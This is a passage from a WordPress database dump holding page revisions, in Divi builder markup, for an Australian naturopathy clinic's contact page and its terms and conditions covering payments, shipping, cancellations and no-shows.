button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong>Clinic location:</strong></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#C7D3BA\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 20:13:34','2021-05-26 12:13:34','',26,'https://verde.desidrivers.com.au/?p=193',0,'revision','',0),(168,1,'2021-05-26 14:47:07','2021-05-26 06:47:07','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.4.8\" background_color=\"#f9f3eb\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(249,243,235,0.8)\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||170px||false|false\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.4.8\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"-70px||||false|false\" custom_padding=\"2px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#000000\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#000000\" background_color_gradient_end=\"rgba(0,0,0,0.64)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-02.jpg\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit Message\" _builder_version=\"4.9.4\" form_field_background_color=\"rgba(0,0,0,0)\" form_field_text_color=\"rgba(255,255,255,0.7)\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#ffffff\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"1px\" border_color_all=\"#ffffff\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" hover_enabled=\"0\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong>Clinic location:</strong></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" hover_enabled=\"0\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\" custom_margin=\"|||265px||\" sticky_enabled=\"0\" border_color_all=\"#ccd4c8\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#C7D3BA\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Playfair Display|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_bg_enable_color=\"on\" button_icon_color=\"#000000\" button_text_color=\"#000000\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" custom_padding=\"||0px|||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact Us','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 14:47:07','2021-05-26 06:47:07','',26,'https://verde.desidrivers.com.au/?p=168',0,'revision','',0),(170,1,'2021-05-26 14:49:51','2021-05-26 06:49:51','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\" sticky_enabled=\"0\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Payment for face-to-face consults is required at the completion of the appointment. A 50% deposit is required for online consults at the time of booking. Should you need to cancel your booking, this will be refunded if more than 24 hours’ notice is provided. The deposit is forfeited if the booking is cancelled with less than 24 hours’ notice.</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted via Zoom. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Zoom link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our privacy policy for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','inherit','closed','closed','','2-revision-v1','','','2021-05-26 14:49:51','2021-05-26 